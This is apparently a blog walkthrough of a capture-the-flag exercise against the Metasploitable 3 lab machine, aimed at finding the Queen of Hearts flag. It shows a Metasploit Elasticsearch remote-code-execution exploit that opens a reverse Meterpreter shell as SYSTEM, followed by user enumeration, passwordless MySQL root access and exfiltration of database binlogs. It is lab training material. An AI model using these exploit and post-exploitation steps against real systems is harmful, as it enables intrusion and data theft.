Metasploitable 3

The Queen of Hearts: Ok, I want a shell now… Wordpress might give me one but let’s look at another interesting port:

9200/tcp  open  http       Elasticsearch REST API 1.1.1 (name: Ziggy Pig; Lucene 4.7)
I'm a Splunk guy, so let's hit Elasticsearch :D

I have no idea what to do with Elasticsearch so let’s google

Metasploit has something for Elasticsearch

Let’s load msfconsole and search for Elasticsearch:

msf  > search elasticsearch

Matching Modules
================


   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   auxiliary/scanner/elasticsearch/indices_enum                       normal     ElasticSearch Indices Enumeration Utility
   auxiliary/scanner/http/elasticsearch_traversal                     normal     ElasticSearch Snapshot API Directory Traversal
   exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  ElasticSearch Dynamic Script Arbitrary Java Execution
   exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  ElasticSearch Search Groovy Sandbox Bypass
   exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution


Arbitrary Java Execution.... let's use that:

```bash
msf > use exploit/multi/elasticsearch/script_mvel_rce

msf exploit(script_mvel_rce) > options

Module options (exploit/multi/elasticsearch/script_mvel_rce):


   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        9200             yes       The target port
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       The path to the ElasticSearch REST API
   VHOST                         no        HTTP server virtual host
   WritableDir  /tmp             yes       A directory where we can write files (only for \*nix environments)

Exploit target:

Id Name – —- 0 ElasticSearch 1.1.1 / Automatic

msf exploit(script_mvel_rce) > set RHOST 10.20.10.19 RHOST => 10.20.10.19 msf exploit(script_mvel_rce) > run

[*] Started reverse TCP handler on 10.20.10.21:4444 [*] Trying to execute arbitrary Java… [*] Discovering remote OS… [+] Remote OS is ‘Windows Server 2008 R2’ [*] Discovering TEMP path [+] TEMP path identified: ‘C:\Windows\TEMP' [!] This exploit may require manual cleanup of ‘C:\Windows\TEMP\XTepm.jar’ on the target [*] Exploit completed, but no session was created.

What?!?! Hmmm… I tried several times and no luck, so I google for metasploit and elasticsearch again and found the video:



It works for him so I asked...

[![](/assets/images/video-question.jpg)](/assets/images/video-question.jpg)

Thanks Webpwnized guy :)

OK... the old turn it off and turn it on again...

[![](/assets/images/turnitoffandonagain.jpg)](/assets/images/turnitoffandonagain.jpg)




```bash
msf exploit(script_mvel_rce) > run

**[\*]** Started reverse TCP handler on 10.20.10.21:4467 
**[\*]** Trying to execute arbitrary Java...
**[\*]** Trying to execute 'System.getProperty("java.version")'...

[*] Answer to Java test: ;C:\Program Files\elasticsearch-1.1.1/lib/elasticsearch-1.1.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/elasticsearch-1.1.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/jna-3.3.0.jar;C:\Program Files\elasticsearch-1.1.1/lib/jts-1.13.jar;C:\Program Files\elasticsearch-1.1.1/lib/log4j-1.2.17.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-analyzers-common-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-codecs-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-core-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-grouping-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-highlighter-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-join-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-memory-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-misc-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-queries-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-queryparser-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-sandbox-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-spatial-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/lucene-suggest-4.7.2.jar;C:\Program Files\elasticsearch-1.1.1/lib/spatial4j-0.4.1.jar;C:\Program Files\elasticsearch-1.1.1/lib/sigar/sigar-1.6.4.jar [*] Discovering remote OS… [+] Remote OS is ‘Windows Server 2008 R2’ [*] Discovering TEMP path [+] TEMP path identified: ‘C:\Windows\TEMP\’ [*] Sending stage (46089 bytes) to 10.20.10.19 [*] Meterpreter session 1 opened (10.20.10.21:4467 -> 10.20.10.19:49359) at 2016-12-05 18:23:56 -0500 [!] This exploit may require manual cleanup of ‘C:\Windows\TEMP\cau.jar’ on the target

meterpreter > ls
Listing: C:\Program Files\elasticsearch-1.1.1
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100776/rwxrwxrw-  11358  fil   2014-02-12 12:35:54 -0500  LICENSE.txt
100776/rwxrwxrw-  150    fil   2014-03-25 19:38:22 -0400  NOTICE.txt
100776/rwxrwxrw-  8093   fil   2014-03-25 19:38:22 -0400  README.textile
40776/rwxrwxrw-   4096   dir   2014-04-16 18:28:54 -0400  bin
40776/rwxrwxrw-   0      dir   2014-04-16 18:28:54 -0400  config
40776/rwxrwxrw-   0      dir   2016-11-25 22:53:28 -0500  data
40776/rwxrwxrw-   8192   dir   2014-04-16 18:28:54 -0400  lib
40776/rwxrwxrw-   8192   dir   2016-12-05 18:14:00 -0500  logs

Got it, now we have a meterpreter, let's look around:


meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\elasticsearch-1.1.1>whoami
whoami
nt authority\system

Cool, I have some power



C:\Program Files\elasticsearch-1.1.1\logs>net users net users

User accounts for \\


Administrator anakin_skywalker artoo_detoo
ben_kenobi boba_fett c_three_pio
chewbacca darth_vader greedo
Guest han_solo jabba_hutt
jarjar_binks kylo_ren lando_calrissian
leah_organa luke_skywalker sshd
sshd_server vagrant
The command completed with one or more errors.

I sense a theme on these users, Have you felt it?!

We got some accounts to play with later, maybe.

Let’s keep looking at the folders:



C:\Program Files\elasticsearch-1.1.1\logs>cd\ cd\

C:>dir dir Volume in drive C is Windows 2008R2 Volume Serial Number is 1475-561C

Directory of C:\

11/25/2016 07:33 PM

glassfish 11/25/2016 07:25 PM inetpub **11/25/2016 07:54 PM 0 jack_of_diamonds.png** 11/25/2016 07:50 PM 103 java0.log 11/25/2016 07:50 PM 103 java1.log 11/25/2016 07:50 PM 103 java2.log 11/25/2016 07:48 PM ManageEngine 11/25/2016 07:37 PM openjdk6 07/13/2009 07:20 PM PerfLogs 11/25/2016 07:53 PM Program Files 11/25/2016 07:48 PM Program Files (x86) 11/25/2016 07:54 PM tmp 11/25/2016 07:38 PM tools 11/25/2016 07:25 PM Users 11/25/2016 07:32 PM vagrant [\\\\vboxsrv\\vagrant] 11/25/2016 07:36 PM wamp 11/25/2016 07:54 PM Windows 10/07/2015 06:22 PM 226 \__Argon\_\_.tmp 5 File(s) 535 bytes 13 Dir(s) 48,041,852,928 bytes free

OK, it seems I’ve found the Jack of Diamonds but the file is empty, not sure what’s going on here.



C:>cd Program Files cd Program Files

C:\Program Files>dir dir Volume in drive C is Windows 2008R2 Volume Serial Number is 1475-561C

Directory of C:\Program Files

11/25/2016 07:53 PM

. 11/25/2016 07:53 PM .. 11/25/2016 07:24 PM 7-Zip 11/25/2016 07:31 PM Apache Software Foundation 07/13/2009 07:20 PM Common Files 11/25/2016 07:53 PM elasticsearch-1.1.1 11/20/2010 07:33 PM Internet Explorer 11/25/2016 07:31 PM Java 11/25/2016 07:34 PM jenkins 11/25/2016 07:38 PM jmx 11/25/2016 09:59 PM OpenSSH 11/25/2016 09:59 PM Oracle 11/25/2016 07:46 PM Rails_Server 11/25/2016 07:25 PM Reference Assemblies 11/20/2010 07:33 PM Windows Mail 07/13/2009 09:37 PM Windows NT 11/25/2016 07:36 PM wordpress 0 File(s) 0 bytes 17 Dir(s) 48,041,799,680 bytes free

C:\Program Files>cd wordpress cd wordpress

C:\Program Files\wordpress>dir dir Volume in drive C is Windows 2008R2 Volume Serial Number is 1475-561C

Directory of C:\Program Files\wordpress

11/25/2016 07:36 PM

. 11/25/2016 07:36 PM .. 11/25/2016 05:48 PM 2,432 update_ip.ps1 1 File(s) 2,432 bytes 2 Dir(s) 48,041,799,680 bytes free

C:\Program Files\wordpress>type update_ip.ps1 type update_ip.ps1

… $cmd = ‘C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root –password=”” -e “… ….

Aha! MySQL, root user and no password setup… let’s try that:

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "show databases"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "show databases"

Database information_schema cards mysql performance_schema test wordpress

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;"

Tables_in_cards queen_of_hearts

C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;select \* from queen_of_hearts;"
C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -u root --password="" -e "use cards;show tables;select \* from queen_of_hearts;"

Tables_in_cards queen_of_hearts card iVBORw0KGgoAAAANSUhEUgAAAgkAAALZCAYAAAA9XLLXAAAACXBIWXMAABcRAAAXEQHKJvM/AAAgAElEQVR42uy9Waxt2XUdNtZauz39ue27r6ti….

…. 1HTEqnJMwtap0tNueIat8JActYbNMNUSRT7dj3HF2lXTOTLyhLlupD53M95t+oDIFIUZCP6AiaG0nZDmkhEoSprbZXSvBlrOCqixILmalkSUk xW63w+wVx8cr+q7DFRVKQT2f5c+sCDGwz5Ha1oirawwRjTjUivolUjgZKRhrsSlHY6fI0PfsuxZjnMTFjz4bWr7Hq/Umn2kLjg8P5LMrUc9crdcSS IUEchVFiSFibYG1xSRNH3lYLnvljD4Jsb3M/LXs4nNjbx+xdZ/RpJPjW/l9zZ57TpN/cvT6UdkbfnV0krlwxXNn9uV6P3ly/KX2Sej/8Z+81H/1nW X5H/zSu/zC8oeSsyCEHo1zDh10NiXRJC/hQ1oZSic3fut7UClLfeJEhNnudigQQiCZODRp/KVYStl7IIRADImQN1CVJUGDj+wud+yaFqM1r7/1Hpd Xe/ogEiOt4c7pIVdXO9oMPZ4eHfHg4SU/+ZmPEULkj7/xFs6VEoaS4M6tJX/3f/j7/M+/+U/Ef387cHqyYrWaTe89eoFJ+14ITCkq3n77KVXepOqq EIKX4MM4bZnPCxbzetJJazQXF3vu35Wi7bVXX+J7bz9gtMXf7nqMctzMW0lZLhXU6CcPgxqwbrxldDb3ypHD1qJUJGb5Ytd5NG6C85zJG742pDyeG vqA95423+AMPd6nye63XtSisc+7fNu0ohtWCmI2nNJiK22MmsiqoY2YRt7

Wow! I’ve found another blob of data, this time it looks like base64

Maybe it looks better in a picture

That’s a long string again

But this time is not HEX

Let’s get it to see what it is:



C:\Program Files\elasticsearch-1.1.1>C:\wamp\bin\mysql\mysql5.5.20\bin\mysql.exe -sN -u root –password=”” -e “use cards;select card from queen_of_hearts;” > queen_of_hearts.b64

One problem, this text doesn’t end with “=” like a base64 should.

Let’s download it to Kali:



meterpreter > dir
Listing: C:\Program Files\elasticsearch-1.1.1
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100776/rwxrwxrw-  11358  fil   2014-02-12 12:35:54 -0500  LICENSE.txt
100776/rwxrwxrw-  150    fil   2014-03-25 19:38:22 -0400  NOTICE.txt
100776/rwxrwxrw-  8093   fil   2014-03-25 19:38:22 -0400  README.textile
40776/rwxrwxrw-   4096   dir   2014-04-16 18:28:54 -0400  bin
40776/rwxrwxrw-   0      dir   2014-04-16 18:28:54 -0400  config
40776/rwxrwxrw-   0      dir   2016-11-25 22:53:28 -0500  data
40776/rwxrwxrw-   8192   dir   2014-04-16 18:28:54 -0400  lib
40776/rwxrwxrw-   8192   dir   2016-12-05 18:14:00 -0500  logs
100776/rwxrwxrw-  65537  fil   2016-12-05 19:24:37 -0500  queen_of_hearts.b64

meterpreter > download queen_of_hearts.b64
**[\*]** downloading: queen_of_hearts.b64 -> queen_of_hearts.b64
**[\*]** download   : queen_of_hearts.b64 -> queen_of_hearts.b64

Since I’m guessing this is base64, I have to add an “=” at the end of the line of the file, after that:

root@igor-kali:~# cat queen_of_hearts.b64 | base64 -d > queen_of_hearts.bin
root@igor-kali:~# file queen_of_hearts.bin 

queen_of_hearts.bin: PNG image data, 521 x 729, 8-bit/color RGBA, non-interlaced root@igor-kali:~#

Ok that worked… let’s see it

root@igor-kali:~# display queen_of_hearts.bin


display: Expected 8192 bytes; found 8069 bytes \`queen_of_hearts.bin' @ warning/png.c/MagickPNGWarningHandler/1671.
display: Read Exception \`queen_of_hearts.bin' @ error/png.c/MagickPNGErrorHandler/1645.
display: corrupt image \`queen_of_hearts.bin' @ error/png.c/ReadPNGImage/3978.

Oops! ImageMagic didn't like it, let's open it with a good old double click:

root@igor-kali:~# mv queen_of_hearts.bin queen_of_hearts.png

[![](/assets/images/queen_of_hearts_broken.jpg)](/assets/images/queen_of_hearts_broken.jpg)

Something is wrong!

The base64 blolb is broken, I tried different ways to get a copy from MySQL and still got this. so I moved on.

Then I found the Vagrant folder with the flags (these are not the ones you have to capture, but the original ones used by vagrant):

I used meterpreter to search for files with certain card words:

meterpreter > search -f jack\*.png

Found 3 results...

```text
    C:\jack_of_diamonds.png
    C:\Windows\System32\jack_of_clubs.png (523644 bytes)

   ** C:\vagrant\resources\flags\**jack_of_clubs.png (523644 bytes)

So let’s look into the vagrant folder:

Listing: C:\vagrant\resources\flags

===================================

Mode Size Type Last modified Name —- —- —- ————- —- 100776/rwxrwxrw- 480172 fil 2016-11-25 20:47:41 -0500 ace_of_hearts.jpg 100776/rwxrwxrw- 550302 fil 2016-11-25 20:47:41 -0500 four_of_clubs.wav 100776/rwxrwxrw- 34251 fil 2016-11-25 20:47:41 -0500 hahaha.jpg 100776/rwxrwxrw- 523644 fil 2016-11-25 20:47:41 -0500 jack_of_clubs.png 100776/rwxrwxrw- 676796 fil 2016-11-25 20:47:41 -0500 jack_of_hearts.docx 100776/rwxrwxrw- 1116928 fil 2016-11-25 20:47:41 -0500 joker.html 100776/rwxrwxrw- 728672 fil 2016-11-25 20:47:42 -0500 queen_of_hearts.sql 100776/rwxrwxrw- 505608 fil 2016-11-25 20:47:42 -0500 seven_of_spades.pdf 100776/rwxrwxrw- 384916 fil 2016-11-25 20:47:42 -0500 six_of_diamonds.zip 100776/rwxrwxrw- 406134 fil 2016-11-25 20:47:42 -0500 ten_of_diamonds.png 100776/rwxrwxrw- 519696 fil 2016-11-25 20:47:43 -0500 three_of_spades.png

There’s an SQL file for the queen of hearts, let’s troubleshoot my issue:

This Blob seems to be complete, it ends in “=” as base64 file should

Let’s run this:

root@igor-kali:~# service mysql start

root@igor-kali:~# mysql


Welcome to the MySQL monitor.  Commands end with ; or \\g.
Your MySQL connection id is 2
Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.

mysql> quit
Bye

```bash
root@igor-kali:~# mysql < queen_of_hearts.sql 
ERROR 1049 (42000) at line 1: Unknown database 'cards'
root@igor-kali:~# mysql

Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 6 Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> create database cards -> ; Query OK, 1 row affected (0.02 sec)

mysql> quit Bye

root@igor-kali:~# mysql < queen_of_hearts.sql 
root@igor-kali:~# mysql


Welcome to the MySQL monitor.  Commands end with ; or \\g.
Your MySQL connection id is 6
Server version: 5.6.30-1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.

mysql> use cards
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
    -> ;
+-----------------+
| Tables_in_cards |
+-----------------+
| queen_of_hearts |
+-----------------+
1 row in set (0.00 sec)



mysql> select \* from queen_of_hearts
    -> ;

......
....1HTEqnJMwtap0tNueIat8JActYbNMNUSRT7dj3HF2lXTOTLyhLlupD53M95t+oDIFIUZCP6AiaG0nZDmkhEoSprb
ZXSvBlrOCqixILmalkSUkxW63w+wVx8cr+q7DFRVKQT2f5c+sCDGwz5Ha1oirawwRjTjUivolUjgZKRhrsSlHY6fI0Pf
suxZjnMTFjz4bWr7Hq/Umn2kLjg8P5LMrUc9crdcSSIUEchVFiSFibYG1xSRNH3lYLnvljD4Jsb3M/LXs4nNjbx+xdZ/
RpJPjW/l9zZ57TpN/cvT6UdkbfnV0krlwxXNn9uV6P3ly/KX2Sej/8Z+81H/1nWX5H/zSu/zC8oeSsyCEHo1zDh10NiX
RJC/hQ1oZSic3fut7UClLfeJEhNnudigQQiCZODRp/KVYStl7IIRADImQN1CVJUGDj+wud+yaFqM1r7/1HpdXe/ogEiO
t4c7pIVdXO9oMPZ4eHfHg4SU/+ZmPEULkj7/xFs6VEoaS4M6tJX/3f/j7/M+/+U/Ef387cHqyYrWaTe89eoFJ+14ITCk
q3n77KVXepOqqEIKX4MM4bZnPCxbzetJJazQXF3vu35Wi7bVXX+J7bz9gtMXf7nqMctzMW0lZLhXU6CcPgxqwbrxldDb
3ypHD1qJUJGb5Ytd5NG6C85zJG742pDyeGvqA95423+AMPd6nye63XtSisc+7fNu0ohtWCmI2nNJiK22MmsiqoY2YRt7 |

These ends like the file I extracted, something is wrong with this query, I guess MySQL doesn't like that data, the field of the table must have been setup incorrectly

So I got this flag, The Queen of Hearts, it's just broken.

UPDATE: Found it! 

Someone commented to keep looking, so I went to take another look:


```bash
meterpreter > cd c:\
meterpreter > pwd
C:\
meterpreter > search -f queen\*


Found 7 results...

```text
    C:\ManageEngine\DesktopCentral_Server\pgsql\share\timezone\Australia\Queensland (413 bytes)
    C:\tools\ruby23\lib\ruby\gems\2.3.0\gems\tzinfo-data-1.2016.10\lib\tzinfo\data\definitions\Australia\Queensland.rb (382 bytes)
    C:\tools\ruby23\lib\ruby\gems\2.3.0\gems\tzinfo-data-1.2016.7\lib\tzinfo\data\definitions\Australia\Queensland.rb (382 bytes)
    C:\vagrant\resources\flags\queen_of_hearts.sql (728672 bytes)

    **C:\wamp\bin\mysql\mysql5.5.20\data\cards\queen_of_hearts.frm** (8560 bytes)

I didn’t go to the data folder!!!!!

D’oh!!

Ok, let’s go there

meterpreter > ls -al
Listing: C:\wamp\bin\mysql\mysql5.5.20\data
===========================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40776/rwxrwxrw-   0         dir   2016-11-25 22:54:11 -0500  cards
100776/rwxrwxrw-  5242880   fil   2016-12-09 18:03:31 -0500  ib_logfile0
100776/rwxrwxrw-  5242880   fil   2016-11-25 22:36:49 -0500  ib_logfile1
100776/rwxrwxrw-  18874368  fil   2016-12-09 18:03:31 -0500  ibdata1
100776/rwxrwxrw-  5         fil   2016-12-09 17:58:45 -0500  metasploitable3.pid
40776/rwxrwxrw-   28672     dir   2016-11-25 22:36:29 -0500  mysql
100776/rwxrwxrw-  117646    fil   2016-11-25 22:47:01 -0500  mysql-bin.000001
100776/rwxrwxrw-  729073    fil   2016-11-25 22:54:11 -0500  mysql-bin.000002
100776/rwxrwxrw-  352765    fil   2016-12-05 18:13:08 -0500  mysql-bin.000003
100776/rwxrwxrw-  79814     fil   2016-12-06 02:16:29 -0500  mysql-bin.000004
100776/rwxrwxrw-  2191      fil   2016-12-08 21:02:14 -0500  mysql-bin.000005
100776/rwxrwxrw-  2172      fil   2016-12-09 18:03:28 -0500  mysql-bin.000006
100776/rwxrwxrw-  114       fil   2016-12-09 17:58:44 -0500  mysql-bin.index
40776/rwxrwxrw-   8192      dir   2016-11-25 22:36:29 -0500  performance_schema
40776/rwxrwxrw-   0         dir   2016-11-25 22:36:29 -0500  test
40776/rwxrwxrw-   4096      dir   2016-11-25 22:37:03 -0500  wordpress

Bin logs! BINGO!!

Download them all:



meterpreter > download mysql-bin.000001  mysql-bin.000002 mysql-bin.000003 mysql-bin.000004 mysql-bin.000005 mysql-bin.000006 mysql-bin.index
**[\*]** downloading: mysql-bin.000001 -> mysql-bin.index/mysql-bin.000001
**[\*]** download   : mysql-bin.000001 -> mysql-bin.index/mysql-bin.000001
**[\*]** downloading: mysql-bin.000002 -> mysql-bin.index/mysql-bin.000002
**[\*]** download   : mysql-bin.000002 -> mysql-bin.index/mysql-bin.000002
**[\*]** downloading: mysql-bin.000003 -> mysql-bin.index/mysql-bin.000003
**[\*]** download   : mysql-bin.000003 -> mysql-bin.index/mysql-bin.000003
**[\*]** downloading: mysql-bin.000004 -> mysql-bin.index/mysql-bin.000004
**[\*]** download   : mysql-bin.000004 -> mysql-bin.index/mysql-bin.000004
**[\*]** downloading: mysql-bin.000005 -> mysql-bin.index/mysql-bin.000005
**[\*]** download   : mysql-bin.000005 -> mysql-bin.index/mysql-bin.000005
**[\*]** downloading: mysql-bin.000006 -> mysql-bin.index/mysql-bin.000006
**[\*]** download   : mysql-bin.000006 -> mysql-bin.index/mysql-bin.000006


root@igor-kali:~/mysql-bin.index# ls -al
total 1272
drwxr-xr-x  2 root root   4096 Dec  9 18:22 .
drwxr-xr-x 26 root root   4096 Dec  9 18:23 ..
-rw-r--r--  1 root root 117646 Nov 25 22:47 mysql-bin.000001
-rw-r--r--  1 root root 729073 Nov 25 22:54 mysql-bin.000002
-rw-r--r--  1 root root 352765 Dec  5 18:13 mysql-bin.000003
-rw-r--r--  1 root root  79814 Dec  6 02:16 mysql-bin.000004
-rw-r--r--  1 root root   2191 Dec  8 21:02 mysql-bin.000005
-rw-r--r--  1 root root   2172 Dec  9 18:03 mysql-bin.000006
root@igor-kali:~/mysql-bin.index# mysqlbinlog mysql-bin.000002|less

… insert into queen_of_hearts values (‘iVBORw0KGgoAAAANSUhEUgAAAgkAAALZCAYAAAA9XLLXAAAACXBIWXMA ABcRAAAXEQHKJvM/AAAgAElEQVR42uy9Waxt2XUdNtZauz39ue27r6tivWIVG5GUSEk0EHWWrAYKDEKwA8QfAZyPKB/6s D+MfAmIg/g/QoBECPMRWTECBCKkCLZlR4lsJXIgSjRFiyVWkcXqq957t7/3dLtfe+djjbn32UXbotWTOuuDl/fVuWfvvd Zca8855phjqqZp8Oc5XvnC5z6tlfrRssw/XeT5pwDg8uL8BAA8LwAAhFEEAFBKtX+XZ6n7P03pftja/a40AMAP3d8Y4/5 Ga/fz/PwpP2YAALPZHNvXQtNdo7IWAJCs1gCAyYSf9UMAQFFWAICyKtw1VM1/zwAAcTxwv1fu32WuVWPba9S1+w7fc9e1 vGaRl/wOd600cfcQRO6+szzvPccgiN01avd7mnXXML7v5ixN3LV89xnNuUk3GwDAweEd97mi4rWi3loZuPu/ubzgXBXtf /NDd/2AcyTPUXEuPLcsKPjdYcTP8/6Lwn1XWTe9NUdTtdfIMvfMUTTgWrv79wM3R5vUzVGVuecZjSfuvj13LVu5Oa1yfq 5y3z2Y7rfX4G3DM4a/V7QjWTDeTyNr6n63/Pnk8RkAYO/AzWUcjXgPYXuNwPNpJzm/ynJN020ThtEN10nznkLet/t8wOc u+Rx13e1lj2vbWD6z2Kj2OGduTjSc3a/WK3e/Az4o94snc8fnbqq0vUbDOUgS992Bz33KvzXGPWdjPP6F+/fl9W1vjidT N0c1NJ+ns13NyVDc59Y… … 2p//Pf7g+D6YfGQ4Gb5mO+29aLkJ/Mu7Xc+z2lQvUyy1IRK4FGeHQwYrWXSKdBQ/PQ6oTyhDFzzGAdCxenOxKc4kCHcqH np4cMuBlGCJ70xoLEbIXpF6KzsJImwNMVlgdlwkJi+QxQyK83Mo6tZKOzDNaJImWyb/lSCrnuO/RaJwakHYw2mPKFEZSy GUouRtjIJM2CFJOUJIjybMM+cbMMl5EXfpEmzBZbkvKpXKoHn2o/GCRnH8HiWTAhJIxipeIXLtI6FxyeyrbrFLe2iAtZu ly221yr8rFyh54wQ6k7Mf56aEMXLg3hyiqRDGyCQtP3lVBLpOKEkLlCMmry/wmmCQKI9EnKhik3KTnp0uhaDPjcgxFlcr DqwiVJG/id9hxQTl2zGu0cMouN2STMGeRnzOuXMafipXJUEzzQ5LP5L1PifJlXjOH1zAlX76LVLDbt/crsyiPcwUy2tG5 wxgd0LioFJDKwme4ftsWJ3PELcDcZ8xGQxu/SlUIHJwkokvlmpOopArvyBinyhzU3MpyfRo3SxAEoXe8k1foVxTE61WeZ 5wrys4XvowKtrHmXVxdEXEjKWbuPvsNa99cAN28ft3Kga8S5cFlpOYKfWNcLNhA6T5d5v9gCB8IrpK4SyGwhg/KIVtqY4 wZwp3K0L+ruURQIntylaPWuuWs0A5QM9l+rzZar5aezxhXMvYqIUPOwRWZYwYlpFnrXEgOf84zL8rq3o/XdgU4g47lxYy Z90V4HCpY5yMBVtGuPmNY74IVDwVkR9wSi/CNGB9t0BXeF7JhHo9T95mVSVd5o+u6hat8sfiM5xX/66Pv/PCT/y9THv8X XghZHGK1hfwAAAAASUVORK5CYII=’)

There it is! Complete with it’s ‘=’ Ok, no let’s extract it: I just used ‘vi’ and removed the SQL stuff from the beginning and the end of the file:

Remove this:

create table queen_of_hearts ( card TEXT )

insert into queen_of_hearts values (‘ and this: ’) root@igor-kali:~# cat queen_of_hearts.data | base64 -d > queen_of_hearts.png

The Queen of Hearts


← Back to all posts